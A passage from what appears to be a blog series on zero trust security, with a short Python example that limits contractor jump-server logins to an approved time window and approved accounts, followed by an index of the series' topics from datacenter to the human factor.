complexity.
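The time-window and explicit-approval controls described above can be sketched in a few lines.  This is a hypothetical illustration, not how any particular vendor implements it: a contractor login succeeds only when it falls inside an approved window and the account has an active approval from IT staff.

```python
from datetime import datetime, time

# Hypothetical access policy for contractor accounts on a jump server:
# logins only during a defined window, and only with an explicit approval.
ACCESS_WINDOW = (time(8, 0), time(18, 0))   # 08:00-18:00 local time
approved_sessions = {"contractor-jane"}     # approvals granted by IT staff

def login_permitted(user: str, now: datetime) -> bool:
    """Allow login only inside the window and only with an active approval."""
    start, end = ACCESS_WINDOW
    in_window = start <= now.time() <= end
    return in_window and user in approved_sessions

print(login_permitted("contractor-jane", datetime(2024, 5, 1, 10, 30)))  # True
print(login_permitted("contractor-jane", datetime(2024, 5, 1, 22, 0)))   # False - after hours
print(login_permitted("contractor-bob", datetime(2024, 5, 1, 10, 30)))   # False - not approved
```

Because every contractor session has to pass a gate like this on the jump server, the network-level rules behind it can stay simple – a small set of permitted hosts rather than a sprawling per-contractor rule base.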

Zero Trust Philosophy Index

This series on security philosophy will explore the areas of security that need to be addressed in order to make your plan a reality, and discuss specific areas of focus for applying a zero trust mindset.

  • Datacenter
  • Route/switch
    • Features that ensure integrity of network operations
  • Wireless
    • Capabilities for detection and mitigation of RF based attacks
  • Endpoint
    • Network Access Control (NAC) – Ensuring that endpoint activity is controlled and that security threats are detected and mitigated before an exploit can occur
  • Network Security
    • Ensuring that all traffic through the network is controlled and monitored for malicious activity
  • Cloud Security
    • Ensuring that user to cloud access is controlled and that cloud resources are appropriately provisioned and accounted for.
  • The Human Factor
    • Ensuring that end users are aware of security issues and responsible for their security choices.